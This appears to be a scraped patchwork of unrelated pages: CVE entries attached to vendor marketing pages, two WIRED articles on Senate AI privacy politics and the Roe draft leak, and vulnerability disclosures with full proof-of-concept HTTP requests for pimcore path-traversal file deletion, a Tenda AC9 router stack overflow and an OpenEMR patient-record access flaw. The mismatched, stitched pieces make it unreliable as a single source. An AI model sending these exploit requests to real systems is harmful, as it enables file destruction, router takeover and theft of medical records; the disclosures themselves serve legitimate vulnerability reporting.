An issue was discovered in Softing OPC UA C++ SDK before 5.70. An invalid XML element in the type dictionary makes the OPC/UA client crash due to an out-of-memory condition.

1.  You are here:
2.  » Industrial
3.  » Solutions
4.  » OPC and OPC UA

**OPC and OPC UA Solutions**

![](https://industrial.softing.com/fileadmin/_processed_/5/e/csm_01_Software_635x198_EN_7160f16fc8.jpg)

With a track record of more than 20 years of experience in OPC technology, Softing is your OPC partner. Softing offers a complete set of OPC Classic and OPC UA (Unified Architecture) products.  Softing's complete OPC portfolio provides a range of solutions from embedding connectivity into your OEM products to helping you solve PLC connectivity up to business enterprise systems.  Check out Softing's world leading OPC book.  Trust Softing with your OPC and OPC UA connnectivity needs.

**Products:**

OPC Products

Product Information

OPC Development Toolkits

OPC UA and OPC Classic Engineering Development Toolkits for OEMs

eATM OPC UA Server

OPC UA Server, in-chassis module for Rockwell ControlLogix PLC

 

 

echoCollect e

OPC UA gateway for over 50 PLC types, echoCollect e is a multi-protocol gateway including protocols such as MQTT and connectivity to SQL databases.  echoCollect e only connects to Ethernet PLCs.

echoCollect r/m

OPC UA gateway for over 50 PLC types, including serial addressable PLCs.  echoCollect r/m is a multi-protocol gateway including protocols such as MQTT and connectivity to SQL databases.  echocollect r/m connects to both Ethernet and Serial PLCs.

dataFEED OPC Suite

dataFEED OPC and OPC UA middleware (software acting as a bridge between databases and applications) and server solutions for connectivity

dataFEED edgeGate

OPC UA and MQTT gateway for Siemens PLCs and Modbus PLCs.  Supports connectivity to Microsoft Azure Connected Factory, Microsoft Azure IoT Hub, IBM Watson, Amazon AWS.

uaGate SI

OPC UA gateway for Siemens PLCs.  Checkout this article on uaGate SI.

uaGate MB

OPC UA gateway for Modbus PLCs

edgegate

OPC UA gateway for Siemens and Modbus PLCs

**OPC Training**

As a world leader in OPC applications, Softing offers education for OPC developers as well as OPC users.

**OPC Use Cases and References**

Read about the echocollect UA in a project implementation in a worldwide network of plants to realize seamless data exchange (PDF)

**OPC Software Trials**

Softing offers free trials with the complete functionality. Runtime is limited to 90 minutes. Under "Downloads" Technology "OPC", you will find the trial version for your desired OPC product.

**OPC Book**

From OPC Data Access to OPC Unified Architecture, the latest edition of the OPC Book provides an excellent overview of the fundamentals, implementation, and application of standardized data exchange via OPC. A key focus is on the new OPC generation – OPC UA – that allows for platform-independent data and information exchange. More information

**OPC Certification**

Independent Test Lab OPC Certification is the process of ensuring that applications meet the standards specified by the OPC Foundation. OPC Certification requires extensive testing to ensure true interoperability. OPC Certification means multi-vendor system interoperability is guaranteed. If your OPC products are not certified, you need to ask your vendor what sort of guarantees they offer.

CVE-2021-42262: OPC and OPC UA | Softing

The US Congress is trying to tame the rapid rise of artificial intelligence. But senators’ failure to tackle privacy reform is making the task a nightmare.

The recent burst of generative artificial intelligence is forcing the US Senate into a debate lawmakers have put off for years: privacy reform.

While Americans’ personal data is a commodity sold, traded, mined, and even “recycled,” passing from second party to third party to digital banana stand, some senators believe your personal data is siloed off from the earth-altering AI work those companies, like OpenAI and Google, are testing, tweaking, and deploying daily.

“They want to predict the future for purposes of marketing and selling products, and that’s already there,” says Florida Republican Marco Rubio, the vice-chair of the Senate Intelligence Committee, dismissing the need for an overhaul of federal privacy laws.

Rubio is far from an outlier. Ted Cruz of Texas, the top Republican on the Senate Commerce Committee, agrees. “I think if the Democrats push through restrictions on innovation and AI, it would be disastrous for America,” Cruz says. If the United States doesn’t lead, goes the GOP’s stock argument, an adversarial nation (read: China) will.

Still, there’s fear about AI’s potential to dramatically alter the world, which has kept senators mostly united over the need to do _something_. But with lawmakers beginning to write AI-related legislation, old and unresolved privacy debates are proving a major impediment—and there’s little room for error on the tightrope of bipartisanship in today’s Washington.

In our rapidly evolving world, Congress must debate the past, even as AI is statistically generating our future.

Lesson Not Learned

Before Congress left Washington for a month-long August recess, senators held their third and final all-senators AI briefing. Although not all 100 senators attended, the bipartisan, closed-door AI briefings were intended to provide a baseline framework for understanding artificial intelligence. If nothing else, the briefings surely got senators talking about AI. Almost instantly, the AI chatter resurrected data privacy debates that had died in each recent congressional session.

Rubio’s gut reaction is that he’s fine with American tech companies running unregulated through the frontiers of AI as they create even newer frontiers. Commerce, he says, is commerce. “They’ll take the data to try to predict what you’re going to buy tomorrow or where you want to travel to tomorrow or what you want to look at. It already does,” Rubio says. “We still have laws that govern things like privacy and property rights and all kinds of \[areas\]. Certainly, those things would still be prohibited whether it’s a human or a machine that’s violating it.”

Senators like Rubio and Cruz appear to forget what happened the last time Congress decided to just let the tech industry run wild. Google swallowed our ability to find information while collecting every bit of personal data it could. Facebook and Twitter created dossiers on everyone who touched them before dictating who and what can be said on social media. And Amazon consumed nearly 40 percent of the retail world (along with our data) while expanding into cloud storage, entertainment, satellite internet, and a bazillion other markets.

In short, the tentacles of US tech firms are everywhere—vaccines, food, cancer research, psilocybin centers, criminal justice reform, homelessness—the list could reach the moon. (Speaking of the moon, how could we forget commercial spaceflight?) And the AI boom is likely to further expand tech firms’ power and riches. Yet on Capitol Hill, some powerful Republicans are focused on one goal: ensuring American AI dominance.

On this front, Rubio generally sees any new regulation as a needless-to-harmful constraint on US technology giants and their AI experiments. One near-universal takeaway from the briefings is that America can’t afford to be number two.

“You’re dealing with a technology that knows no national borders, so even if we write laws that say a company can’t do that in America, it doesn’t mean some company in some other part of the world or some government in other parts of the world won’t innovate that, and use it, and deploy it against the US,” Rubio says.

Senator Mike Rounds, a South Dakota Republican and one of four senators who spearheaded the all-senators briefings, echoes this sentiment. “AI is gonna advance regardless of whether it happens here in the United States or elsewhere. We have to be advancing faster than our adversaries,” he says. “We have to advance it, but we also want to put in appropriate safeguards.”

Specifics remain impossible to pin down in most corners of the Capitol. Lawmakers are still taking in the potential of new language learning models, like ChatGPT and Google’s Bard, even as AI laps us all. Rounds maintains an openness to nebulous new parameters, on the one hand, but in a critical, fatherly way, he also faults Americans for signing over our data privacy.

“Here’s the deal, we voluntarily give it away,” Rounds says. “People don’t seem to realize that when they sign these agreements, they’re giving up a lot of their personal information.”

Recklessly handing over our data might be fine if it’s American tech companies that are grabbing it. But Rounds, like most lawmakers, decries the idea of giving our private data to Chinese-owned TikTok. It’s the one privacy matter everyone can agree on—excluding, perhaps, the 150 million US-based users the company claims to have.

“There doesn’t seem to be a whole lot of concern about it by a significant amount of the American public, which is unfortunate because that’s helping to create the databases that eventually may be used against us,” Rounds says.

While Senate Majority Leader Chuck Schumer and the others tried to steer the conversation around artificial intelligence clear of politics, AI now seems lodged in the age-old partisan debate that pits laissez-faire capitalism against Big Brother, which New Mexico Democrat Martin Heinrich says is regrettably shortsighted.

“We failed to regulate the internet when it was regulatable, and Republicans and Democrats today—for the most part—are going, ‘Holy cow, we subjected our entire teenage population to this experiment, and it’s not serving us well.’ So I just don't think it’s helpful to get hardened,” Heinrich says.

It’s not just Democrats who are voicing concern. There are some outspoken privacy hawks in the GOP, chief among them Senator Josh Hawley, a Missouri Republican. When asked about Cruz and Rubio’s positions—that encroaching on the Silicon Valley data mining model could imperil America’s AI future—Hawley laughs.

“Ha. I don’t know that we’re gonna be able to hermetically seal it like that,” Hawleys says, before laughing uproariously. “This idea that we can just trust Google and Meta to be good actors, you know—not gonna happen.”

While his colleagues are almost solely focused on America’s adversaries, Hawley—who may be China’s biggest critic in the Senate—is unsettled by the thought of American tech companies plugging your private data into their AI language learning models right now.

“We need to just ban that. That’s the way to do it. Yeah, we just say no—in federal law,” Hawley says. “They wouldn’t let you sue if they didn’t. That’s the way to fix that, in my view.”

That’s Hawley’s number one priority. He’s the top Republican on the Senate Judiciary Subcommittee on Privacy, Technology, and the Law and teamed up with its chair, Senator Richard Blumenthal of Connecticut, in introducing the No Section 230 Immunity for AI Act.

The bipartisan pair say the legislation is essential because it explicitly tacks an AI clause onto Section 230 of the 1996 Communications Decency Act, which shields online companies from liability for anything their users post on their platforms. While both senators have spent years trying to overhaul Section 230, they say there’s no time to waste in updating it to protect consumers from generative AI-powered deepfakes.

Point of No Return

This summer’s AI briefings also instilled the need for speed, and senators are finally moving—if at senatorially turtle-like speeds.

Before lawmakers left town for the summer, they passed their first generative AI amendments, tacking them onto the annual, must-pass National Defense Authorization Act (NDAA). One such measure requires the Department of Defense to set up a “bug bounty program” so Pentagon officials can test American-made AI for security flaws.

Senators, led by Schumer, also tucked a nondefense AI amendment into their version of the defense bill, which still must be reconciled with the House version. It mandates that any AI “gap in knowledge” from the Board of Governors of the Federal Reserve System, Federal Deposit Insurance Corporation, Office of the Comptroller of the Currency, National Credit Union Administration, or Bureau of Consumer Financial Protection must be reported to Congress.

Many Democrats agree with the GOP on the need to lead the AI race, though the details are devilish. On the left, the prescription is one of those much-decried government ones.

“We cannot put ourselves at a disadvantage compared to China or other adversaries or competitors. But just like in atomic energy, there needs to be some kind of international structure,” Blumenthal says.

He says that means international agreements, multilateral trust, and “one central agency or office that is responsible for AI and can conduct negotiations with other countries.”

Behind closed doors, senators were warned about an AI fiscal cliff on the horizon, and many seem acutely on edge over how easy replicating AI is now and will be tomorrow. “One of the things that was discussed—I don’t think it’s classified in any way—is, like in almost all technology, the price is going to come down dramatically,” says Senator John Hickenlooper, a Colorado Democrat. “Look at how many billionaires we have, they can create their own large language models.”

Senators are now engaged in many side debates, with a few focused on the technology’s impact on democracy.

“Frankly, I personally haven’t quite figured out what we ought to do,” says Senator Mazie Hirono, a Hawaii Democrat. “But you can see the damage that can be done in the political arena, and I think that there should be some disclosure requirements in the political arena.”

Others are looking at potential disclosure requirements, especially when it comes to AI making decisions on loans, insurance applications, and other consequential matters.

“If a decision is made about you based on AI making the decision, whether it’s an insurance company or your own government, you have a right to be able to know what’s the data set that’s behind that, whether it’s a valid data set,” says Senator James Lankford, an Oklahoma Republican. “And so that’s a bigger challenge.”

Some newer, younger senators left the private AI briefings more unsettled than when they entered. “The lack of specific detail in some of these briefings makes me a little bit worried about what both the Senate and maybe the Department of Defense know about where we are on AI relative to other countries,” says Republican JD Vance, the freshman senator from Ohio. “It’s not clear if they’re so substance-less because they think that you’re stupid or because they’re hiding something.”

While the Senate is now demanding an AI health checkup from an array of federal agencies, lawmakers are also getting in the weeds on their specific committees and hashing out targeted AI proposals.

There’s broad agreement that there’s no going back. “One thing I’m certain of is I know of no technological advance in human history that we’ve been able to roll back. It’s going to happen,” Rubio says. “The question is, how do we build guardrails and practices around it so that we can maximize its benefits and diminish its harms?”

The Senate, meanwhile, can’t go forward without first taking steps back—to the debate Congress never had. For Senators Hawley and Blumenthal, AI safeguards start with overhauling Section 230. “You’ve got to put that there, and then you can build around that,” Hawley says. “If people don’t have the right, you can tell them, ‘don’t use your data stores for generative AI,’ but then if they do it anyway, it’s like what, the FTC fines them $1 million? No, you have to let people sue and do class actions. Then they pay attention.”

The Senate’s AI Future Is Haunted by the Ghost of Privacy Past

CVE-2021-28675

Found Linux Kernel flaw in the i740 driver. The Userspace program could pass any values to the driver through ioctl() interface. The driver doesn't check the value of 'pixclock', so it may cause a divide by zero error.

CVE-2022-3061

**What kind of security feature could be bypassed by successfully exploiting this vulnerability?**

An attacker who successfully exploited this vulnerability could execute RPC procedures that are restricted to privileged accounts, bypassing the access check for the RPC procedures.

CVE-2023-32021: Windows SMB Witness Service Security Feature Bypass Vulnerability

Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) in CallRail, Inc. CallRail Phone Call Tracking plugin <= 0.4.9 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

CallRail is here to bring complete visibility to the marketers who rely on quality inbound leads to measure success. Our customers live in a results-driven world, and giving them a clear view into their digital marketing efforts is a first priority for CallRail. We see the opportunities in surfacing and connecting data from calls, forms, chat and beyond — helping our customers get to better outcomes.

Our WordPress plugin allows you to learn detailed information about the source and web session of every caller from your website using a process called Dynamic Number Insertion. It also powers our form tracking tool, which gives you the power to attribute form submissions back to their source and learn about what the user did on your site before submitting the form.

*   Learn more about CallRail.
*   Check out our WP plugin support documentation.

1.  Sign in to your CallRail account and click the **Settings tab**.
2.  Select the company you want from the dropdown menu.
3.  Find the WordPress plugin in the list of integrations and click **Instructions**.
4.  Download the plugin and follow the instructions listed.

Full documentation can be found here.

Constant integration issues with Adwords make our conversion data mostly useless. In Adwords this is a huge problem. They recently lost 2/3 of our all time call recordings!!!!! This data was priceless and is unrecoverable. Callrail's support is some of the worst I have encountered and even during emergency situations they are not in a hurry to help. Calls to support go unanswered and if we get a callback it is often the next day by someone who has little knowledge. We are finding a new company to work with and I would suggest others to do the same. I will update this post with a full breakdown of all our callrail issues once we have migrated to a new provider. Too many to list at the current moment 🙁

Read all 4 reviews

“CallRail Phone Call Tracking” is open source software. The following people have contributed to this plugin.

Contributors

*    apowellgt

**0.2**

*   Initial public release.

**0.3**

*   Update to version 2 of the javascript tracking script (swap.js)
*   Prompt the user to add an API key after installation.
*   Don’t insert the CallRail script if no API key is present.
*   Trim whitespace surrounding the API key before saving.

**0.3.1**

*   Update to version 3 of the javascript tracking script (swap.js)

**0.3.2**

*   Update to version 4 of the javascript tracking script (swap.js) which supports more advanced number replacement.

**0.3.3**

*   Update to version 5 of the javascript tracking script (swap.js)

**0.3.4**

*   Update to version 7 of the javascript tracking script (swap.js) and serve the script via the MaxCDN network (cdn.callrail.com).

**0.3.5**

*   Update to version 8 of the javascript tracking script (swap.js).

**0.3.6**

*   Update to version 10 of the javascript tracking script (swap.js).

**0.3.7**

*   Add a HTML comment so the CallRail support team can see when swap.js is installed via WordPress.

**0.3.8**

*   Update to version 11 of the javascript tracking script (swap.js).

**0.3.11**

*   Set Callrail cookies via HTTP using xhr request from swap.js script.

**0.4.0**

*   Added an optional feature to load required scripts as first-party through WordPress.

**0.4.1**

*   Various bug fixes.
*   Default first-party swap.js to on after testing if it is supported or not.

**0.4.2**

*   Fix bug where forms were not rendering for first-party enabled sites.

**0.4.3**

*   update the readme.

**0.4.4**

*   Change the default value for the “Enable As First Party Script” flag to false for initial Installations.

**0.4.5**

*   Add the newly required parameter “permission\_callback” to all custom REST endpoint definitions

**0.4.6**

*   Updating tested up to version.

**0.4.7**

*   Updating tested up to version. redeploy.

**0.4.8**

*   Updating tested up to version. redeploy.

**0.4.9**

*   Fixed End User IP Address detection

CVE-2022-36796: CallRail Phone Call Tracking

The leak of a draft opinion overturning Roe v. Wade quickly sparked a court investigation. Which laws may have been violated, if any, remains uncertain.

The leak of a seismic draft opinion from the US Supreme Court that would overturn _Roe v. Wade_ has somehow managed overnight to elicit roughly equal outpourings of anger from the right and left: The left has rallied to decry a decision that would overturn a 50-year-old cornerstone of reproductive rights. Conservatives, despite the historic victory the ruling would represent for their side, have meanwhile targeted their political outrage at a far more specific individual: the leaker.

Just hours after Politico published a draft of the majority ruling written by Justice Samuel Alito calling the _Roe_ decision "egregiously wrong from the start" and overruling that five-decade-old precedent, figures across the right issued a chorus of calls for the investigation and prosecution of the anonymous source of the "illegal" leak. CBS News went so far as to report—somewhat vaguely—that it expects an investigation “involving the FBI” into the leak's source. And Chief Justice John Roberts has opened an investigation into the disclosure.

But all of that furor is undermined by an inconvenient legal truth: Leaking a Supreme Court decision doesn't actually seem to be a crime—at least not by any clear and undisputed definition. "Right now, it's unclear whether the leaker broke any law at all," says Trevor Timm, a First Amendment–focused lawyer and the executive director of the Freedom of the Press Foundation. "Even the people claiming this act is beyond the pale and the FBI must investigate haven't pointed to a definitive law this leaker allegedly broke."

Timm cites a lengthy Twitter thread published late Monday by the well-known UC Berkeley legal scholar Orin Kerr, who responded to the leak Monday night by pointing out that a Supreme Court draft doesn't meet any of the obvious criteria that would make it an illegal document to hand to a journalist: Most important, it's not classified, so leaking it doesn't open the leaker to prosecution under the Espionage Act. "As far as I can tell, there is no federal criminal law that directly prohibits disclosure of a draft legal opinion," Kerr concluded.

Of course, if the source is someone who hacked into a computer of, say, a Supreme Court justice or law clerk—or swiped the paper off their desk—the leaker could be prosecuted with computer fraud and abuse or theft, Kerr points out. But otherwise, despite the historical rarity of Supreme Court leaks and the politically radioactive nature of this one, Kerr argues there's no slam-dunk argument to federally prosecute the leaker.

Instead, Kerr suggests that any federal prosecutor seeking to make a case against Politico's leaker might have to resort to a far shakier statute, known as 18 U.S.C. § 641. That broad statute forbids the theft or misuse of government-owned "things of value"—a broadly written law seemingly designed at a surface level to prevent embezzlement or graft by those with access to the government's property. But whether it applies to information—and what kind of information, given to whom—remains an open question in federal law, with different circuit courts fundamentally disagreeing in their rulings.

"Legal scholarship provides little clarity regarding § 641’s interpretation; only a few scholars have even recognized § 641’s application to information," reads a _Columbia Law Review_ article about the statute's use for prosecuting leakers, written by Jessica Lutkenhaus, an attorney focused on criminal defense at the law firm Wilmer Hale. "The circuits disagree about whether § 641 applies to information, and, if it does, what its scope is: What information constitutes a 'thing of value'?"

Sharing information is arguably fundamentally different from stealing "a thing of value," Freedom of the Press Foundation's Timm points out. "You can't steal a government Jeep or take something tangible or physical from government offices," Timm says. "But copying something can be construed as different from stealing something. You copy it, and the original thing is still there, and you just leave with papers that didn't exist before."

That ambiguity has led different federal courts to come to contradictory conclusions. A Fourth Circuit court, for instance, found in 1991 that a Department of Defense employee who left the DOD for a job at a defense contractor and took information with him was guilty of violating § 641. But a Ninth Circuit court has come to an opposite conclusion, finding in a 1959 case that "intangible" goods are not covered by § 641. That ruling was later applied in 1988 by the same circuit to the case of an information leaker, a naval officer accused of stealing computer punch cards related to secret encryption information. The court confirmed that the information itself was not covered by § 641—though his appeal was thrown out anyway because he'd stolen the physical punch cards that stored it.

Other circuit courts have come to conclusions somewhere in between, with some finding, for instance, that the § 641 _does_ apply to information leaks but noting that this doesn't extend to those covered by the First Amendment's protections on free speech and freedom of the press—findings with direct relevance to Politico's Supreme Court leaker.

Several of the most notable leakers in history have been charged under 18 U.S.C. § 641, too, including Daniel Ellsberg, Chelsea Manning, and Edward Snowden. But the use of that law was overshadowed by their prosecution under the Espionage Act, since all three were accused of leaking classified secrets, and none set a clear precedent. Ellsberg's charges were dropped due to improper government conduct by the Nixon administration, and Snowden has yet to face trial. Manning was convicted on the 18 U.S.C. § 641 count she faced, but in a military court, not a civilian one.

All of that leaves the legal status of Politico's leaker—if they are identified—far from certain. But any confident argument that they committed a crime is on equally shaky terrain, argues Timm. And that's especially true in a case where the leaker appears to have leaked a document directly to the press, with a clear interest in making the information public.

"Even if prosecutors think 18 U.S.C. § 641 applies, I'd have serious First Amendment concerns with broadly applying it to anyone who leaks a government document to the press," Timm says. "Leaks to the press are as American as apple pie. And, in many cases throughout history, have furthered democracy rather than hindered it."

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Is Leaking a SCOTUS Opinion a Crime? The Law Is Far From Clear

Path Traversal in GitHub repository pimcore/pimcore prior to 10.3.2.

**Description**

The application doesn't perform a check/filter against the value of "importFile" parameter at endpoint "/admin/translation/import". After the API is executed, PHP unlink function will proceed to delete the file.

**Proof of Concept**

*   Step 1: Login as admin at https://10.x-dev.pimcore.fun/admin.
*   Step 2: Using burpsuite to proxy request. Go to Settings -> Admin Translations -> Import & Merge CSV
*   Step 3: Edit value of importFile in request call to /admin/translation/import

    POST /admin/translation/import?merge=2 HTTP/1.1
    Host: 10.x-dev.pimcore.fun
    Cookie: pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MTExLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ0NDgxMjAxLCJfdSI6MTY0NDQ4MjgyMywidmk6c3J1IjpbN119LCJleHAiOjE2NDQ0ODQ2MjN9.0Ezd501szQiJryBsTcmEajyE0cKw3Jy0D7vnaIi0f7M; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MjE4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjQ0NDgxMjAyLCJfdSI6MTY0NDQ4MTIwMn0sImV4cCI6MTY3NjAxODgyM30.QVPovPchi8Amu7U6HfloyPzaqWM9raWqTr8WyaODiHU; _pc_vis=bdd4fff7d63cd197; _pc_ses=1644481631796; _ga=GA1.4.1223340938.1644481632; _gid=GA1.4.1727336840.1644481632; PHPSESSID=8ec8b25fc8744112040d525dc3a0cff0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1644481466&perspective=
    X-Pimcore-Csrf-Token: 3940b07522d199209cfd8b6083f0959e0f907449
    X-Pimcore-Extjs-Version-Major: 7
    X-Pimcore-Extjs-Version-Minor: 0
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 263
    Origin: https://10.x-dev.pimcore.fun
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    importFile=../../../../../../../../../var/www/html/vendor/pimcore/pimcore/lib/Model/AbstractModel.php&csvSettings={"delimiter":":","escapechar":"\\","lineterminator":"\n","quotechar":"\""}&domain=admin&delimiter=%3a&escapechar=%5C&lineterminator=%0a&quotechar=%22
    

*   Step 4: Logout and go to https://10.x-dev.pimcore.fun/admin, you will see error "Failed opening '/var/www/html/vendor/composer/../pimcore/pimcore/lib/Model/AbstractModel.php' for inclusion". Sorry for my mistake, can you revert https://10.x-dev.pimcore.fun.

*   PoC:

https://drive.google.com/file/d/17EtF8I3ChKL14uDxaelBa0GLeHq6APjy

https://drive.google.com/file/d/1JnffQheSMgnKeAaQjYQxMHxDwCS3UA80

**Root-cause:**

*   Path traversal: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L71
    
*   File delete: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L95
    

**Impact**

Attacker can delete any file on the server (successful file deletion depends on the current user is running web service)

**Occurrences**

CVE-2022-0665: Path Traversal in pimcore

Tenda AC9 V15.03.2.21_cn was discovered to contain a stack overflow via the function openSchedWifi.

**Tenda AC9 V15.03.2.21\_cn stack overflow****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220214114428086](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC9/2/img/image-20220214114428086.png)

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

At the beginning of the function, the content corresponding to the schedendtime parameter is passed to V20, and then V20 is directly copied to the stack of PTR + 10. There is no size check, so there is a stack overflow vulnerability

![image-20220214123422702](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC9/2/img/image-20220214123422702.png)

![image-20220214123431803](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC9/2/img/image-20220214123431803.png)

![image-20220214123443416](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC9/2/img/image-20220214123443416.png)

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.2.21\_cn
2.  Attack with the following POC attacks

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.11.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1602
    Origin: http://192.168.11.1
    Connection: close
    Referer: http://192.168.11.1/wifi_time.html?random=0.20002645587866297&
    Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcnbf1qw
    
    schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=01aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC9/2/img/image-20220214114614959.png)

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shel![image-20220214123320952](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC9/2/img/image-20220214123320952.png)

CVE-2022-25418: IOT_vuln/Tenda/AC9/2 at main · EPhaha/IOT_vuln

Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0.

**Vulnerability Type**

Insecure Direct Object Reference

**Affected URL**

https://localhost/openemr/interface/patient\_file/report/custom\_report.php

**Affected Parameters**

“Issue\_7”

**Authentication Required?**

Yes

**Issue Summary**

Non-privilege users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. There is no Access Control enforced, therefore, any authenticated user of OpenEMR can download patient records by just tampering the “Issue\_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.

**Recommendation**

Implement ACL check to ensure that only authorized users of OpenEMR system are able to download patient documents from the vulnerable end-point.

**Credits**

Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com) Rizan, Sheikh (rizan.sheikhmohdfauzi@baesystems.com) Ali Radzali  
(muhammadali.radzali@baesystems.com)

**Issue Reproduction**

Login to OpenEMR as Admin and capture the POST request to the following end-point:

`https://localhost/openemr/interface/patient_file/report/custom_report.php`

In Burp, the HTTP POST request, cookie “OpenEMR” & parameter “issue\_7” can be tampered.

    Host: 192.168.0.141
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 155
    Origin: http://192.168.0.141
    Connection: close
    Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
    Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
     
    Upgrade-Insecure-Requests: 1
     
    include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F
    

Replace the “OpenEMR” Cookie with Accountant Cookie and increment the “issue\_7” parameter to any valid number eg “issue\_7=/15/” to access patient documents.

**References**

*   This bug was already reported and fix by Openemr project team. Kindly reach out to Brad in case of questions. Details of patch at: https://www.open-emr.org/wiki/index.php/OpenEMR\_Patches

Search

lenovo warranty check/lookup | check warranty status | lenovo support us